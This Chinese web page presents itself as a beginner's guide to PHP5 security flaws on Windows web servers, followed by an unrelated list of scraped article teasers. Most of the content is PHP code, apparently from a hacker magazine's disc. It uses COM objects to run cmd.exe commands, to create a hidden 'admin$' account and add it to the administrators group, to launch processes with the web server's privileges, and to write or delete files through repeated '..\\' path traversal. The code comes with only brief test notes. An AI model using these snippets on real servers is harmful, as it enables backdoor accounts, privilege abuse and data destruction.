php5的安全问题讲解[新手必读]

问题存在于php5,windows平台,通用apache2和iis
添加用户
<?php
$wscript = new COM('wscript.shell'); $wscript->Run("cmd.exe /c net user admin$ /add");
$wscript->Run("cmd.exe /c net localgroup administrators admin$ /add");
?>
测试结果为添加了受限的用户,并没有加入管理员组

通过http 服务软件运行程序。
<?php
$compatUI = new COM('{0355854A-7F23-47E2-B7C3-97EE8DD42CD8}');
$compatUI->RunApplication("something", "notepad.exe", 1);
?>
测试结果为进程继承了http服务软件的权限。
以服务为运行方式的http服务软件运行的进程是不可视的,但如果用zend studio来运行的话就可以看见了。

其他代码没有一一测试,现将黑防杂志附送光盘里的代码贴上来。

RunApplication函数测试代码
<?php
$compatUI = new COM('{0355854A-7F23-47E2-B7C3-97EE8DD42CD8}');
$compatUI->RunApplication("something", "notepad.exe", 1);
?>

Wscript运行命令测试代码
<?php
$wscript = new COM('wscript.shell');
$wscript->Run("cmd.exe /c calc.exe");
?>
<?php
$wscript = new COM('wscript.shell'); $wscript->Run("cmd.exe /c net user admin$ /add");
$wscript->Run("cmd.exe /c net localgroup administrators admin$ /add");
?>

OpenTextFile测试代码
<?php   
$mPath = str_repeat("..\",20);
$FSO = new COM('Scripting.FileSystemObject');
$FSO->OpenTextFile($mPath."bat.bat", 8, true);
?>   

DeleteFile测试代码
<?php
$mPath = str_repeat("..\",20);
$FSOdelFile = new COM('Scripting.FileSystemObject');
$FSOdelFile->DeleteFile($mPath.".\*.dat", True);
?>

DeleteFolder测试代码
<?php
$mPath = str_repeat("..\",20);
$FSOdelFolder = new COM('Scripting.FileSystemObject');
$FSOdelFolder->DeleteFolder($mPath.".\11", True);
?>

Create函数测试代码
<?php
$user = new COM('{60664CAF-AF0D-0004-A300-5C7D25FF22A0}');
$user->Create("asd");
?>

时间: 2025-01-20 10:13:52

php5的安全问题讲解[新手必读]的相关文章

Java新手必读

Java新手必读 1. 学习Java学什么? a) Java语法基础:如基本数据类型.流程控制.数组等等. b) 面向对象的概念:理解类和对象的概念等等. c) 开发工具:Jbuilder.Eclipse等 d) 一定量的常用类库:如String.集合框架.日期操作等等. e) 专业类库:如做Web的要知道JSP/Servlet,做数据库要知道JDBC等等. f) API文档的使用:熟练查阅你没有用过的类,立刻上手. 2. 怎样才算学好Java? a) 扎实的基本功--深刻理解基本语法 b) 具

从头开始学代理(新手必读)(转帖) (一梦浮生)_代理服务器

从头开始学代理(新手必读)(转帖)  (一梦浮生)   扫盲篇 什么是代理服务器?     代理服务器是介于浏览器和Web服务器之间的一台服务器,当你通过代理服务器上网浏览时,浏览器不是直接到Web服务器去取回网页,而是向代理服务器发出请求,由代理服务器来取回浏览器所需要的信息,并传送给你的浏览器.  什么是免费代理服务器?     在使用代理猎手等软件搜索代理服务器地址时,会在验证状态栏中出现类似"要密码"."Free"等字样.如果你把"Free&quo

域名注册的相关知识(新手必读)第1/2页_网站应用

普及一下域名注册知识(新手必读)! 一.选择注册商和代理商:1.万网:http://www.net.cn2.易名:http://www.ename.cn3.新网互联:http://www.dns.com.cn4.商务中国:http://www.bizcn.com5.新网数码:http://www.xinnet.com6.中国频道:http://www.onlinenic.com/chinese/7.国域网:http://www.66.cn8.中资源:http://www.zzy.cn 9.时代互

新手必读:站长购买外链的学问

中介交易 http://www.aliyun.com/zixun/aggregation/6858.html">SEO诊断 淘宝客 云主机 技术大厅 关于外链的购买,已经有很多相关方面文章了,不过很多新手站长即便看过很多遍,可还是感觉还是一头雾水.今天我就特别讲解一下"外链购买"的方法和技巧,以及需要注意的事项和相关方面知识.既然都是站长,不管是老鸟还是新手,相信"外链"这个词大家并不陌生.每一个站长新开一个网站之后,第一步要做的肯定就是增加网站的外

前端工程师新手必读:掌握基本技能弄清概念

公司招了几个刚毕业的学生,作为重构的新手让我来带. 首先感谢感谢党.感谢国家.感谢公司给了我这样的一个机会,对我工作的肯定和认可,让我带这样的一个重构团队,同时我也明白任务的艰巨,但我一定会将工作做好,不负公司对我的期望.(哈哈,好像从小到大,老师都是教育我们要这样先说的.) 在网站的发展史上,初期的网站建设根本不需要网页重构这个职位,WEB1.0时代的网页,只需要程序员,一堆堆的表格嵌套就完成,或者美工进行配合完成,先由美工负责设计好,再用一些自动化的软件拉伸几下,直接将设计好的图就可以通过软

遥控直升机新手必读

很多新手朋友拿到直升机非常兴奋,以致于忘记要学习航模知识就马上开始操作,结果挫折重重,通常都会找我们问为什么,甚至认为是产品问题,让我们不得不一次又一次地对这些新手朋友进行解答和指导.航模不等于玩具,不是按个开关就能随心所欲的,需要玩家认真学习.仔细思考.耐心摸索.我们重申:所有直升机在发货之前均经过严格的检查和测试,没有问题才发货,请不要在遇到问题的时候第一个反应就是产品有毛病. 本文将不断更新,篇幅会不断加长,链接也会越来越多.为体验畅快飞行的乐趣,新手朋友即便花再多时间阅读多次也值得! 一

新手必读:让你的站快速被百度收录

中介交易 http://www.aliyun.com/zixun/aggregation/6858.html">SEO诊断 淘宝客 云主机 技术大厅 根据目前百度算法有些改变,笔者过来在站长站跟一些新手站长朋友分享一下,在这个时间里我们应该怎么将我们的站快速让百度收录,以下笔者的一点心得和体会! 1.在你做站之前一定要选择跟你网站相符的域名来做,这样可以让百度对你的站有很高的评价,假如你有很好的技术你可以设置一个跳转然后转到一个权重比较高的站,这样最好不过了! 2.当网站建设好以后,迅速将

新手必读 深入解读网站内链

中介交易 http://www.aliyun.com/zixun/aggregation/6858.html">SEO诊断 淘宝客 云主机 技术大厅 说到网站用户体验,除了服务器稳定.网站框架适合阅读以外,网站内链的布置也是非常的重要.什么是网站内链?简单点说,就是指网站页面之间的互相链接!优化人员也称之为站内链接.优秀的网站内链布置,对提升网站的收录数量以及权重非常有帮助. 对于网站内链,优化人员对此再熟悉不过了,但对于有些刚刚接触seo的朋友来说,并没有深刻的了解网站内链的意义,今天阿

新手必读:学会通俗易懂的SEO

中介交易 http://www.aliyun.com/zixun/aggregation/6858.html">SEO诊断 淘宝客 云主机 技术大厅 站长们其实我们可以用一个简单的方法来进行优化,对于老手来说这篇文章可能没有多大的帮助,今天笔者跟新手朋友们分享一个简单而实用的优化技巧,其余的话不多说了,我们直接进入正题! 1.标题:大家都知道title是标题标签的意思,新手朋友你要在这里选择适合你网站的目标关键词也就是告诉搜索引擎你这个站主要是做什么的! 2.首页:最好使用象home或in